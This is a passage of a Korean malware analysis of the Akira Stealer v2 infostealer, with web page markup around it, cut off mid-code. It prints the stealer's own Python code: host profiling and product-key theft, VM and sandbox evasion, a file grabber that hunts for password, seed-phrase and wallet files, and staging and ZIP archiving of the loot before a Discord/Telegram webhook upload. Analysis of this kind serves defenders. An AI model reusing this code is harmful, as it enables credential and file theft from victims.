...\n",[1679,9120,9121],{"class":1681,"line":3055},[1679,9122,9123],{},"        self.ip = requests.get(url=\"https://api.ipify.org\").text\n",[1679,9125,9126],{"class":1681,"line":3848},[1679,9127,9128],{},"        ipdata = json.loads(requests.post(url=f\"http://ip-api.com/json/{self.ip}\").text)\n",[1679,9130,9131],{"class":1681,"line":3854},[1679,9132,9133],{},"        self.country = ipdata.get(\"country\")\n",[1679,9135,9136],{"class":1681,"line":4103},[1679,9137,9138],{},"        self.countryCode = ipdata.get(\"countryCode\", \"\").lower()\n",[603,9140,9141,9154],{},[606,9142,9143,3256,9146,9149,9150,9153],{},[539,9144,9145],{},"사용자명 및 호스트명:",[550,9147,9148],{},"os.getlogin()","과 ",[550,9151,9152],{},"COMPUTERNAME"," 환경 변수를 통해 회수됩니다.",[606,9155,9156,3256,9159,9162,9163,9165],{},[539,9157,9158],{},"IP 주소:",[550,9160,9161],{},"requests.get(\"https://api.ipify.org\")","로 가져온 뒤, ",[550,9164,5325],{},"을 통해 국가 및 ISO 코드로 지오로케이션합니다.",[861,9167,9169],{"id":9168},"_7102-os-및-하드웨어-열거","7.10.2 OS 및 하드웨어 열거",[532,9171,867],{},[532,9173,9174],{},"Windows Management Instrumentation(WMI) 명령을 사용:",[587,9176,9178],{"className":4489,"code":9177,"language":4491,"meta":593,"style":593},"# Operating System\nself.computerOS = subprocess.run('wmic os get Caption', shell=True, capture_output=True).stdout\n# Total Physical Memory\nself.totalMemory = subprocess.run('wmic computersystem get totalphysicalmemory', ...)\n# BIOS UUID\nself.uuid = subprocess.run('wmic csproduct get uuid', ...)\n# CPU Identifier\nself.cpu = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:System...\\Processor_Identifier'\", ...)\n# GPU Name\nself.gpu = subprocess.run('wmic path win32_VideoController get name', ...)\n# Windows Product Key\nself.productKey = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\\\Microsoft\\\\Windows NT...SoftwareProtectionPlatform' -Name BackupProductKeyDefault\", ...)\n",[550,9179,9180,9185,9190,9195,9200,9205,9210,9215,9220,9225,9230,9235],{"__ignoreMap":593},[1679,9181,9182],{"class":1681,"line":1682},[1679,9183,9184],{},"# Operating System\n",[1679,9186,9187],{"class":1681,"line":2059},[1679,9188,9189],{},"self.computerOS = subprocess.run('wmic os get Caption', shell=True, capture_output=True).stdout\n",[1679,9191,9192],{"class":1681,"line":2065},[1679,9193,9194],{},"# Total Physical Memory\n",[1679,9196,9197],{"class":1681,"line":2071},[1679,9198,9199],{},"self.totalMemory = subprocess.run('wmic computersystem get totalphysicalmemory', ...)\n",[1679,9201,9202],{"class":1681,"line":2393},[1679,9203,9204],{},"# BIOS UUID\n",[1679,9206,9207],{"class":1681,"line":2399},[1679,9208,9209],{},"self.uuid = subprocess.run('wmic csproduct get uuid', ...)\n",[1679,9211,9212],{"class":1681,"line":3055},[1679,9213,9214],{},"# CPU Identifier\n",[1679,9216,9217],{"class":1681,"line":3848},[1679,9218,9219],{},"self.cpu = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:System...\\Processor_Identifier'\", ...)\n",[1679,9221,9222],{"class":1681,"line":3854},[1679,9223,9224],{},"# GPU Name\n",[1679,9226,9227],{"class":1681,"line":4103},[1679,9228,9229],{},"self.gpu = subprocess.run('wmic path win32_VideoController get name', ...)\n",[1679,9231,9232],{"class":1681,"line":5028},[1679,9233,9234],{},"# Windows Product Key\n",[1679,9236,9237],{"class":1681,"line":5034},[1679,9238,9239],{},"self.productKey = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\\\Microsoft\\\\Windows NT...SoftwareProtectionPlatform' -Name BackupProductKeyDefault\", ...)\n",[532,9241,9242,9243,9246],{},"결과는 사람이 읽을 수 있는 문자열로 파싱되고(",[550,9244,9245],{},"strip()",", 인덱스 연산) 다음으로 연결됩니다:",[587,9248,9250],{"className":4489,"code":9249,"language":4491,"meta":593,"style":593},"self.system_info = (\n    f\"Computer Name: {self.computerName}\\n\"\n    f\"Total Memory: {self.totalMemory}\\n\"\n    f\"CPU: {self.cpu}\\n\"\n    f\"GPU: {self.gpu}\\n\"\n    f\"Product Key: {self.productKey}\"\n)\n",[550,9251,9252,9257,9262,9267,9272,9277,9282],{"__ignoreMap":593},[1679,9253,9254],{"class":1681,"line":1682},[1679,9255,9256],{},"self.system_info = (\n",[1679,9258,9259],{"class":1681,"line":2059},[1679,9260,9261],{},"    f\"Computer Name: {self.computerName}\\n\"\n",[1679,9263,9264],{"class":1681,"line":2065},[1679,9265,9266],{},"    f\"Total Memory: {self.totalMemory}\\n\"\n",[1679,9268,9269],{"class":1681,"line":2071},[1679,9270,9271],{},"    f\"CPU: {self.cpu}\\n\"\n",[1679,9273,9274],{"class":1681,"line":2393},[1679,9275,9276],{},"    f\"GPU: {self.gpu}\\n\"\n",[1679,9278,9279],{"class":1681,"line":2399},[1679,9280,9281],{},"    f\"Product Key: {self.productKey}\"\n",[1679,9283,9284],{"class":1681,"line":3055},[1679,9285,5246],{},[861,9287,9289],{"id":9288},"_7103-vm-탐지-및-안티-샌드박스-검사","7.10.3 VM 탐지 및 안티 샌드박스 검사",[532,9291,867],{},[532,9293,9294,9295,9297],{},"심층 프로파일링 전에, 멀웨어는 ",[550,9296,4661],{},"을 호출하여 가상화나 분석 환경을 탐지합니다:",[587,9299,9301],{"className":4489,"code":9300,"language":4491,"meta":593,"style":593},"if VmProtect.isVM(1):\n    sys.exit()\n",[550,9302,9303,9308],{"__ignoreMap":593},[1679,9304,9305],{"class":1681,"line":1682},[1679,9306,9307],{},"if VmProtect.isVM(1):\n",[1679,9309,9310],{"class":1681,"line":2059},[1679,9311,9312],{},"    sys.exit()\n",[532,9314,9315],{},"주요 검사 항목:",[603,9317,9318,9324,9330,9336],{},[606,9319,9320,9323],{},[539,9321,9322],{},"레지스트리 키 및 드라이버 디스크립터",": 가상화 관련 레지스트리 항목을 조회합니다.",[606,9325,9326,9329],{},[539,9327,9328],{},"블랙리스트 UUID 및 컴퓨터 이름",": 알려진 VM 지문과 대조합니다.",[606,9331,9332,9335],{},[539,9333,9334],{},"HTTP 시뮬레이션",": HTTPS로 존재하지 않는 도메인에 연결을 시도합니다.",[606,9337,9338,974,9341,619,9344,619,9347,9350],{},[539,9339,9340],{},"프로세스 블랙리스트",[550,9342,9343],{},"wireshark",[550,9345,9346],{},"ollydbg",[550,9348,9349],{},"ida64"," 같은 도구를 종료하는 백그라운드 스레드를 생성합니다.",[861,9352,9354],{"id":9353},"_7104-패키징-및-전송","7.10.4 패키징 및 전송",[532,9356,867],{},[532,9358,9359,9360,9363],{},"수집된 ",[550,9361,9362],{},"system_info",", IP, 국가 플래그는 웹훅 페이로드 헤더에 삽입됩니다:",[587,9365,9367],{"className":4489,"code":9366,"language":4491,"meta":593,"style":593},"webhook_payload = {\n    \"embeds\": [{\n        \"title\": f\"💉 Infected {self.computerName}/{self.username} | {self.ip} {flag}\",\n        \"description\": description + \"\\n```⚙️ System Info\\n\" + self.system_info + \"```\",\n        \"fields\": [...]\n    }]\n}\nrequests.post(self.webhook_url, json=webhook_payload)\n",[550,9368,9369,9374,9379,9384,9389,9394,9399,9403],{"__ignoreMap":593},[1679,9370,9371],{"class":1681,"line":1682},[1679,9372,9373],{},"webhook_payload = {\n",[1679,9375,9376],{"class":1681,"line":2059},[1679,9377,9378],{},"    \"embeds\": [{\n",[1679,9380,9381],{"class":1681,"line":2065},[1679,9382,9383],{},"        \"title\": f\"💉 Infected {self.computerName}/{self.username} | {self.ip} {flag}\",\n",[1679,9385,9386],{"class":1681,"line":2071},[1679,9387,9388],{},"        \"description\": description + \"\\n```⚙️ System Info\\n\" + self.system_info + \"```\",\n",[1679,9390,9391],{"class":1681,"line":2393},[1679,9392,9393],{},"        \"fields\": [...]\n",[1679,9395,9396],{"class":1681,"line":2399},[1679,9397,9398],{},"    }]\n",[1679,9400,9401],{"class":1681,"line":3055},[1679,9402,2402],{},[1679,9404,9405],{"class":1681,"line":3848},[1679,9406,9407],{},"requests.post(self.webhook_url, json=webhook_payload)\n",[603,9409,9410,9416],{},[606,9411,9412,9415],{},[539,9413,9414],{},"플래그 이모지",": ISO 국가 코드에서 파생됩니다.",[606,9417,9418,9421],{},[539,9419,9420],{},"필드",": 탈취된 암호, 쿠키 등의 개수를 포함하지만, 시스템 정보는 즉각적인 맥락을 위해 임베드 설명에 담깁니다.",[532,9423,9424,9427],{},[539,9425,9426],{},"요약:","\nAkira Stealer v2의 시스템 프로파일링은 WMI 명령, 환경 변수, IP 지오로케이션을 통해 포괄적인 호스트 및 네트워크 데이터를 수집합니다. VM 탐지 및 도구 종료 루틴과 결합되어, 이는 공격자가 침해된 환경의 완전한 스냅샷을 확보하도록 보장하여, 표적화된 후속 조치를 강화하고 분석 샌드박스를 걸러냅니다.",[713,9429,9431,9432,2013],{"id":9430},"_711-파일-그래버클래스-utilssteal_files","7.11 파일 그래버(클래스: ",[550,9433,9434],{},"Utils.steal_files",[532,9436,719],{},[532,9438,9439],{},"브라우저 데이터와 토큰을 넘어, Akira는 문서, 스프레드시트, 개인 메모, 암호화 키 파일 같은 가치 있는 사용자 생성 콘텐츠도 추출하려고 시도합니다. 파일 그래버 모듈이 이 작업을 담당합니다. 흔한 파일 유형과 패턴을 찾아 고가치 디렉터리를 스캔한 뒤, 이를 조용히 유출 번들에 추가하는 방식으로 작동합니다. 이 모듈을 특히 위험하게 만드는 것은 그 단순함과 집중력입니다. 전체 파일 시스템을 크롤링하려 하지 않고, 민감한 파일이 일반적으로 저장되는 특정 고확률 위치를 겨냥합니다. 여기에는 사용자의 홈 경로를 기준으로 한 Desktop, Documents, Downloads, OneDrive 디렉터리가 포함됩니다. 이 집중된 접근은 속도와 은닉성을 모두 향상시켜, 스캔 중 탐지 가능성을 줄입니다. 또한 시스템이나 보호된 디렉터리에 접근하지 않음으로써 사용자에게 경고를 주지 않습니다. 관심 있는 파일이 발견되면, 임시 폴더로 복사되고, 선택적으로 이름이 변경되거나 그룹화되며, 이후 유출 단계에서 업로드되는 최종 ZIP 아카이브로 압축됩니다.",[861,9441,9443],{"id":9442},"_7111-대상-디렉터리-열거","7.11.1 대상 디렉터리 열거",[532,9445,867],{},[532,9447,9448],{},"스틸러는 네 개의 고수확 폴더에 초점을 맞춥니다:",[587,9450,9452],{"className":4489,"code":9451,"language":4491,"meta":593,"style":593},"searchFolders = [\n    \"Desktop\",\n    \"Documents\",\n    \"Downloads\",\n    \"OneDrive\"\n]\n",[550,9453,9454,9459,9464,9469,9474,9479],{"__ignoreMap":593},[1679,9455,9456],{"class":1681,"line":1682},[1679,9457,9458],{},"searchFolders = [\n",[1679,9460,9461],{"class":1681,"line":2059},[1679,9462,9463],{},"    \"Desktop\",\n",[1679,9465,9466],{"class":1681,"line":2065},[1679,9467,9468],{},"    \"Documents\",\n",[1679,9470,9471],{"class":1681,"line":2071},[1679,9472,9473],{},"    \"Downloads\",\n",[1679,9475,9476],{"class":1681,"line":2393},[1679,9477,9478],{},"    \"OneDrive\"\n",[1679,9480,9481],{"class":1681,"line":2399},[1679,9482,7921],{},[532,9484,9485],{},"각 폴더는 피해자의 홈 디렉터리를 기준으로 해석됩니다:",[587,9487,9489],{"className":4489,"code":9488,"language":4491,"meta":593,"style":593},"for folder in searchFolders:\n    current_path = os.path.join(os.environ['USERPROFILE'], folder)\n    if os.path.exists(current_path):\n        # proceed to scan\n",[550,9490,9491,9496,9501,9506],{"__ignoreMap":593},[1679,9492,9493],{"class":1681,"line":1682},[1679,9494,9495],{},"for folder in searchFolders:\n",[1679,9497,9498],{"class":1681,"line":2059},[1679,9499,9500],{},"    current_path = os.path.join(os.environ['USERPROFILE'], folder)\n",[1679,9502,9503],{"class":1681,"line":2065},[1679,9504,9505],{},"    if os.path.exists(current_path):\n",[1679,9507,9508],{"class":1681,"line":2071},[1679,9509,9510],{},"        # proceed to scan\n",[861,9512,9514],{"id":9513},"_7112-키워드-및-확장자-필터링","7.11.2 키워드 및 확장자 필터링",[532,9516,867],{},[532,9518,9519],{},[539,9520,9521],{},"키워드 목록",[532,9523,9524],{},"사전 정의된 부분 문자열 집합이 파일 선택을 안내합니다. 하나 이상의 키워드를 포함하는 파일명만 고려됩니다:",[587,9526,9528],{"className":4489,"code":9527,"language":4491,"meta":593,"style":593},"keywordsFiles = [\n    \"passw\", \"seed\", \"mnemo\", \"phrase\", \"login\", \"wallet\",\n    \"crypto\", \"token\", \"backup\", \"secret\", \"account\"\n]\n",[550,9529,9530,9535,9540,9545],{"__ignoreMap":593},[1679,9531,9532],{"class":1681,"line":1682},[1679,9533,9534],{},"keywordsFiles = [\n",[1679,9536,9537],{"class":1681,"line":2059},[1679,9538,9539],{},"    \"passw\", \"seed\", \"mnemo\", \"phrase\", \"login\", \"wallet\",\n",[1679,9541,9542],{"class":1681,"line":2065},[1679,9543,9544],{},"    \"crypto\", \"token\", \"backup\", \"secret\", \"account\"\n",[1679,9546,9547],{"class":1681,"line":2071},[1679,9548,7921],{},[603,9550,9551,9567],{},[606,9552,9553,974,9556,9559,9560,557,9563,9566],{},[539,9554,9555],{},"부분 일치",[550,9557,9558],{},"passw"," 같은 키워드는 ",[550,9561,9562],{},"passwords.txt",[550,9564,9565],{},"passw_backup.docx","를 모두 캡처합니다.",[606,9568,9569,9572],{},[539,9570,9571],{},"광범위한 커버리지",": 인증, 지갑, 암호화폐, 토큰 관련 용어를 포괄합니다.",[861,9574,9576],{"id":9575},"_7113-허용된-파일-유형","7.11.3 허용된 파일 유형",[532,9578,867],{},[532,9580,9581],{},"노이즈를 최소화하기 위해, 확장자 화이트리스트가 적용됩니다:",[587,9583,9585],{"className":4489,"code":9584,"language":4491,"meta":593,"style":593},"allowed_extensions = [\n    \".txt\", \".doc\", \".docx\", \".pdf\", \".csv\", \".xls\", \".xlsx\",\n    \".jpg\", \".png\"\n]\n",[550,9586,9587,9592,9597,9602],{"__ignoreMap":593},[1679,9588,9589],{"class":1681,"line":1682},[1679,9590,9591],{},"allowed_extensions = [\n",[1679,9593,9594],{"class":1681,"line":2059},[1679,9595,9596],{},"    \".txt\", \".doc\", \".docx\", \".pdf\", \".csv\", \".xls\", \".xlsx\",\n",[1679,9598,9599],{"class":1681,"line":2065},[1679,9600,9601],{},"    \".jpg\", \".png\"\n",[1679,9603,9604],{"class":1681,"line":2071},[1679,9605,7921],{},[861,9607,9609],{"id":9608},"_7113-크기-제약","7.11.3 크기 제약",[532,9611,867],{},[532,9613,9614],{},"유출 속도를 최적화하고 대용량 전송을 피하기 위해, 2메가바이트보다 큰 파일은 건너뜁니다:",[587,9616,9618],{"className":4489,"code":9617,"language":4491,"meta":593,"style":593},"file_size_mb = os.path.getsize(full_path) / (1024 * 1024)\nif file_size_mb \u003C= 2:\n    # eligible for copy\n",[550,9619,9620,9625,9630],{"__ignoreMap":593},[1679,9621,9622],{"class":1681,"line":1682},[1679,9623,9624],{},"file_size_mb = os.path.getsize(full_path) / (1024 * 1024)\n",[1679,9626,9627],{"class":1681,"line":2059},[1679,9628,9629],{},"if file_size_mb \u003C= 2:\n",[1679,9631,9632],{"class":1681,"line":2065},[1679,9633,9634],{},"    # eligible for copy\n",[861,9636,9638],{"id":9637},"_7114-재귀적-스캐닝-및-복사-로직","7.11.4 재귀적 스캐닝 및 복사 로직",[532,9640,867],{},[532,9642,9643],{},"고가치 디렉터리가 식별되면, Akira는 재귀적 스캐닝 루틴을 개시하여 하위 폴더를 순회하고 특정 키워드와 확장자에 일치하는 파일을 찾습니다. 이 단계는 정밀성과 은닉성을 위해 설계되었습니다. 민감한 키워드를 포함하는 파일명과 승인된 파일 유형 같은 사전 정의된 기준에 일치하는 파일만 고려됩니다. 이 로직은 관련성 있는 사용자 생성 콘텐츠만 유출되도록 보장합니다. 시스템 파일, 캐시, 바이너리를 무시하고, 업로드 크기와 탐지 위험을 줄이기 위해 단일 파일 크기를 2 MB로 제한합니다. 이 스캐닝 방법은 조용하고 효율적이며, 실제 환경에서의 은밀한 데이터 탈취에 최적화되어 있습니다. 일치하는 파일을 스테이징 폴더로 복사하고 탈취한 목록을 유지함으로써, Akira는 중복과 운영 노이즈를 최소화하면서 콘텐츠를 번들링과 유출을 위해 준비합니다.",[532,9645,9646,9647,9650],{},"핵심 루틴 ",[550,9648,9649],{},"steal_files()","는 다음과 같이 작동합니다:",[587,9652,9654],{"className":4489,"code":9653,"language":4491,"meta":593,"style":593},"@staticmethod\ndef steal_files():\n    stolen_files = set()\n    temp_folder = Utils.get_temp_folder()\n\n    for folder in searchFolders:\n        current_path = os.path.join(os.environ['USERPROFILE'], folder)\n        if os.path.exists(current_path):\n            for root, _, files in os.walk(current_path):\n                for file in files:\n                    lower = file.lower()\n                    # Keyword check\n                    if any(keyword in lower for keyword in keywordsFiles):\n                        ext = os.path.splitext(lower)[1]\n                        # Extension and size check\n                        if ext in allowed_extensions and os.path.getsize(os.path.join(root, file)) \u003C= 2 * 1024 * 1024:\n                            # Prepare destination\n                            files_dir = os.path.join(temp_folder, \"Files\")\n                            os.makedirs(files_dir, exist_ok=True)\n                            shutil.copy(os.path.join(root, file), os.path.join(files_dir, file))\n                            stolen_files.add(file)\n    data.stolen_files.extend(stolen_files)\n",[550,9655,9656,9660,9665,9670,9675,9679,9684,9689,9694,9699,9704,9709,9714,9719,9724,9729,9734,9739,9744,9749,9754,9759],{"__ignoreMap":593},[1679,9657,9658],{"class":1681,"line":1682},[1679,9659,4980],{},[1679,9661,9662],{"class":1681,"line":2059},[1679,9663,9664],{},"def steal_files():\n",[1679,9666,9667],{"class":1681,"line":2065},[1679,9668,9669],{},"    stolen_files = set()\n",[1679,9671,9672],{"class":1681,"line":2071},[1679,9673,9674],{},"    temp_folder = Utils.get_temp_folder()\n",[1679,9676,9677],{"class":1681,"line":2393},[1679,9678,3845],{"emptyLinePlaceholder":325},[1679,9680,9681],{"class":1681,"line":2399},[1679,9682,9683],{},"    for folder in searchFolders:\n",[1679,9685,9686],{"class":1681,"line":3055},[1679,9687,9688],{},"        current_path = os.path.join(os.environ['USERPROFILE'], folder)\n",[1679,9690,9691],{"class":1681,"line":3848},[1679,9692,9693],{},"        if os.path.exists(current_path):\n",[1679,9695,9696],{"class":1681,"line":3854},[1679,9697,9698],{},"            for root, _, files in os.walk(current_path):\n",[1679,9700,9701],{"class":1681,"line":4103},[1679,9702,9703],{},"                for file in files:\n",[1679,9705,9706],{"class":1681,"line":5028},[1679,9707,9708],{},"                    lower = file.lower()\n",[1679,9710,9711],{"class":1681,"line":5034},[1679,9712,9713],{},"                    # Keyword check\n",[1679,9715,9716],{"class":1681,"line":5040},[1679,9717,9718],{},"                    if any(keyword in lower for keyword in keywordsFiles):\n",[1679,9720,9721],{"class":1681,"line":5046},[1679,9722,9723],{},"                        ext = os.path.splitext(lower)[1]\n",[1679,9725,9726],{"class":1681,"line":5052},[1679,9727,9728],{},"                        # Extension and size check\n",[1679,9730,9731],{"class":1681,"line":5058},[1679,9732,9733],{},"                        if ext in allowed_extensions and os.path.getsize(os.path.join(root, file)) \u003C= 2 * 1024 * 1024:\n",[1679,9735,9736],{"class":1681,"line":5064},[1679,9737,9738],{},"                            # Prepare destination\n",[1679,9740,9741],{"class":1681,"line":5070},[1679,9742,9743],{},"                            files_dir = os.path.join(temp_folder, \"Files\")\n",[1679,9745,9746],{"class":1681,"line":5076},[1679,9747,9748],{},"                            os.makedirs(files_dir, exist_ok=True)\n",[1679,9750,9751],{"class":1681,"line":5082},[1679,9752,9753],{},"                            shutil.copy(os.path.join(root, file), os.path.join(files_dir, file))\n",[1679,9755,9756],{"class":1681,"line":5088},[1679,9757,9758],{},"                            stolen_files.add(file)\n",[1679,9760,9761],{"class":1681,"line":5094},[1679,9762,9763],{},"    data.stolen_files.extend(stolen_files)\n",[532,9765,9766],{},[539,9767,9768],{},"핵심 포인트:",[2079,9770,9771,9779,9789,9797,9803],{},[606,9772,9773,9778],{},[539,9774,9775],{},[550,9776,9777],{},"os.walk",": 하위 디렉터리로 재귀적으로 내려갑니다.",[606,9780,9781,9784,9785,9788],{},[539,9782,9783],{},"대소문자 구분 없는 매칭",": 파일명은 ",[550,9786,9787],{},"lower()","를 통해 정규화됩니다.",[606,9790,9791,974,9794,9796],{},[539,9792,9793],{},"원자적 복사",[550,9795,7787],{},"를 사용해 파일 내용을 보존합니다.",[606,9798,9799,9802],{},[539,9800,9801],{},"탈취된 파일명 집합",": 동일한 파일이 두 번 나타날 때 중복 복사를 방지합니다.",[606,9804,9805,974,9810,9813],{},[539,9806,9807,9809],{},[550,9808,9067],{},"와의 통합",[550,9811,9812],{},"data.stolen_files","가 이후 보고를 위해 탈취된 파일 목록을 축적합니다.",[861,9815,9817],{"id":9816},"_7115-아카이빙-및-유출","7.11.5 아카이빙 및 유출",[532,9819,867],{},[532,9821,9822,9823,9826],{},"수집 후, ",[550,9824,9825],{},"Files"," 폴더는 압축되어 전송됩니다:",[587,9828,9830],{"className":4489,"code":9829,"language":4491,"meta":593,"style":593},"# Archive\nUtils.zip_client_file()  # creates CLIENT.zip from temp_folder\n\n# Upload & Notify\nakira.sendFilesTG(Utils.get_temp_folder(), startup)\nhook.sendFilesTG(Utils.get_temp_folder(), startup)\n",[550,9831,9832,9837,9842,9846,9851,9856],{"__ignoreMap":593},[1679,9833,9834],{"class":1681,"line":1682},[1679,9835,9836],{},"# Archive\n",[1679,9838,9839],{"class":1681,"line":2059},[1679,9840,9841],{},"Utils.zip_client_file()  # creates CLIENT.zip from temp_folder\n",[1679,9843,9844],{"class":1681,"line":2065},[1679,9845,3845],{"emptyLinePlaceholder":325},[1679,9847,9848],{"class":1681,"line":2071},[1679,9849,9850],{},"# Upload & Notify\n",[1679,9852,9853],{"class":1681,"line":2393},[1679,9854,9855],{},"akira.sendFilesTG(Utils.get_temp_folder(), startup)\n",[1679,9857,9858],{"class":1681,"line":2399},[1679,9859,9860],{},"hook.sendFilesTG(Utils.get_temp_folder(), startup)\n",[603,9862,9863,9878],{},[606,9864,9865,974,9870,619,9872,619,9874,9877],{},[539,9866,9867],{},[550,9868,9869],{},"zip_client_file()",[550,9871,9825],{},[550,9873,6326],{},[550,9875,9876],{},"Passwords"," 등을 포함한 전체 임시 디렉터리를 압축합니다.",[606,9879,9880,9884,9885],{},[539,9881,9882],{},[550,9883,9048],{},": Telegram 또는 Discord 웹훅을 통해 다운로드 링크를 게시하며, 탈취된 각 파일명을 나열합니다:",[587,9886,9888],{"className":4489,"code":9887,"language":4491,"meta":593,"style":593},"fields.append({\n\"name\": \"📂 Files\",\n\"value\": \"`\" + \"\\n\".join(data.stolen_files) + \"`\",\n\"inline\": False\n})\n",[550,9889,9890,9895,9900,9905,9910],{"__ignoreMap":593},[1679,9891,9892],{"class":1681,"line":1682},[1679,9893,9894],{},"fields.append({\n",[1679,9896,9897],{"class":1681,"line":2059},[1679,9898,9899],{},"\"name\": \"📂 Files\",\n",[1679,9901,9902],{"class":1681,"line":2065},[1679,9903,9904],{},"\"value\": \"`\" + \"\\n\".join(data.stolen_files) + \"`\",\n",[1679,9906,9907],{"class":1681,"line":2071},[1679,9908,9909],{},"\"inline\": False\n",[1679,9911,9912],{"class":1681,"line":2393},[1679,9913,9914],{},"})\n",[532,9916,9917],{},[539,9918,9919],{},"결론:",[532,9921,9922],{},"Akira Stealer v2의 파일 그래버는 키워드 및 확장자 필터를 사용해 민감한 문서를 체계적으로 사냥하고, 효율을 위해 2 MB 크기 상한을 준수하며, 탈취한 항목을 아카이브로 통합합니다. 그 설계는 넓이(여러 폴더)와 정밀성(표적 필터)을 모두 보장하여, 멀웨어 수명 주기에서 가장 영향력 있는 단계 중 하나로 만듭니다.",[713,9924,9926],{"id":9925},"_712-유출-전략","7.12 유출 전략",[532,9928,719],{},[532,9930,9931],{},"유출 모듈은 수집된 토큰과 추가 아티팩트(쿠키, 자동 완성, 로그)를 구조화된 디렉터리에 스테이징하고, 아카이브로 압축하며, 여러 온라인 파일 호스트에 업로드하고, 상세한 웹훅 알림을 전송하는 방식으로 처리합니다. 이 섹션은 완전한 추적성을 위해 파일 경로, 도메인 엔드포인트, 코드 참조와 함께 각 단계를 해체합니다.",[861,9933,9935],{"id":9934},"_7121-디렉터리-레이아웃-및-파일명","7.12.1 디렉터리 레이아웃 및 파일명",[532,9937,867],{},[532,9939,9940],{},"Akira는 수집된 모든 아티팩트를 깔끔하고 계층적인 임시 디렉터리 구조로 정리합니다. 이 설계는 효율적인 패키징과 공격자의 손쉬운 유출 후 검토를 가능하게 합니다. Tokens, Cookies, Passwords, Screenshots 같은 각 데이터 범주는 피해자의 컴퓨터 이름(예: DESKTOP1234)을 딴 루트 경로 아래 자체 하위 폴더에 저장됩니다. 이 구조화된 레이아웃은 명확성을 보장하고, 중복을 최소화하며, 아카이빙 및 업로드 과정을 간소화합니다. 또한 공격자 측에서 자동화된 파싱이나 수동 검사를 훨씬 쉽게 만듭니다.",[587,9942,9945],{"className":9943,"code":9944,"language":592},[590],"C:\\Users\\User\\AppData\\Local\\Temp\\DESKTOP1234\\\n├─ Tokens\\\n│   ├ token_ab12cd34.txt\n│   └ token_ef56gh78.txt\n├─ Cookies\\\n│   ├ Chrome_Cookies.txt\n│   └ Discord_Cookies.txt\n├─ Autofill\\\n├─ Passwords\\\n├─ Logs\\\n└─ Screenshots\\\n",[550,9946,9944],{"__ignoreMap":593},[861,9948,9950],{"id":9949},"_7122-토큰-및-아티팩트-스테이징","7.12.2 토큰 및 아티팩트 스테이징",[532,9952,867],{},[532,9954,9955],{},"유출 전, Akira는 관련된 모든 아티팩트를 해당 하위 폴더에 스테이징합니다. 예를 들어 토큰 값은 빠른 스캔과 검증을 용이하게 하기 위해 개별 .txt 파일에 기록됩니다. 쿠키, 자동 완성 항목, 암호도 마찬가지로 브라우저별로 명명된 구조화된 텍스트 파일에 기록됩니다. 이 단계는 데이터 레이아웃을 표준화하여, 자동화 도구가 무엇이 수집되었는지 추적할 수 있게 합니다. 또한 어떤 모듈이 트리거되었든 상관없이 ZIP 아카이브가 예측 가능하고 공격자 친화적인 형식을 반영하도록 보장합니다.",[587,9957,9959],{"className":4489,"code":9958,"language":4491,"meta":593,"style":593},"import os, shutil\n# Constants\nTMP = os.getenv('TEMP')\nROOT = os.path.join(TMP, os.getenv('COMPUTERNAME'))\n# Prepare structure\nfor sub in ['Tokens','Cookies','Autofill','Passwords','Logs','Screenshots']:\n    os.makedirs(os.path.join(ROOT, sub), exist_ok=True)\n# Save token\nwith open(os.path.join(ROOT, 'Tokens', f'token_{token[:8]}.txt'), 'w') as f:\n    f.write(token)\n",[550,9960,9961,9966,9971,9976,9981,9986,9991,9996,10001,10006],{"__ignoreMap":593},[1679,9962,9963],{"class":1681,"line":1682},[1679,9964,9965],{},"import os, shutil\n",[1679,9967,9968],{"class":1681,"line":2059},[1679,9969,9970],{},"# Constants\n",[1679,9972,9973],{"class":1681,"line":2065},[1679,9974,9975],{},"TMP = os.getenv('TEMP')\n",[1679,9977,9978],{"class":1681,"line":2071},[1679,9979,9980],{},"ROOT = os.path.join(TMP, os.getenv('COMPUTERNAME'))\n",[1679,9982,9983],{"class":1681,"line":2393},[1679,9984,9985],{},"# Prepare structure\n",[1679,9987,9988],{"class":1681,"line":2399},[1679,9989,9990],{},"for sub in ['Tokens','Cookies','Autofill','Passwords','Logs','Screenshots']:\n",[1679,9992,9993],{"class":1681,"line":3055},[1679,9994,9995],{},"    os.makedirs(os.path.join(ROOT, sub), exist_ok=True)\n",[1679,9997,9998],{"class":1681,"line":3848},[1679,9999,10000],{},"# Save token\n",[1679,10002,10003],{"class":1681,"line":3854},[1679,10004,10005],{},"with open(os.path.join(ROOT, 'Tokens', f'token_{token[:8]}.txt'), 'w') as f:\n",[1679,10007,10008],{"class":1681,"line":4103},[1679,10009,10010],{},"    f.write(token)\n",[603,10012,10013,10016],{},[606,10014,10015],{},"빠른 검사를 위해 토큰은 별도의 작은 텍스트 파일에 저장됩니다.",[606,10017,10018,10021,10022,10025],{},[550,10019,10020],{},"Chromium.GetCookies()","에서 나온 쿠키 덤프는 ",[550,10023,10024],{},"{Browser}_Cookies.txt","에 기록됩니다.",[861,10027,10029],{"id":10028},"_7133-zip-아카이브-생성","7.13.3 ZIP 아카이브 생성",[532,10031,867],{},[532,10033,10034,10035],{},"스테이징이 완료되면, Akira는 전체 디렉터리를 단일 ZIP 아카이브로 압축합니다. 아카이브 파일명은 일관된 명명 규칙을 따릅니다. ",[10036,10037,10038,10039],"computer-name",{},"_",[10040,10041,10042],"timestamp",{},".zip으로, 호스트의 머신 이름과 ISO 8601 형식의 UTC 타임스탬프를 사용합니다. 이는 고유성과 시간순 추적성을 모두 보장합니다. 전체 스테이징 디렉터리를 재귀적으로 순회함으로써, 모든 파일이 ZIP 내에서 상대 구조로 보존됩니다. 이 형식은 특히 수백 명의 피해자가 병렬로 침해되는 경우, 공격자의 대량 회수와 검사를 단순화합니다.",[587,10044,10046],{"className":4489,"code":10045,"language":4491,"meta":593,"style":593},"import zipfile, datetime\n\ndef create_archive(root_dir: str) -> str:\n    ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n    zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n    zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n    with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zf:\n        for dirpath, _, files in os.walk(root_dir):\n            for fname in files:\n                full = os.path.join(dirpath, fname)\n                rel = os.path.relpath(full, root_dir)\n                zf.write(full, rel)\n    return 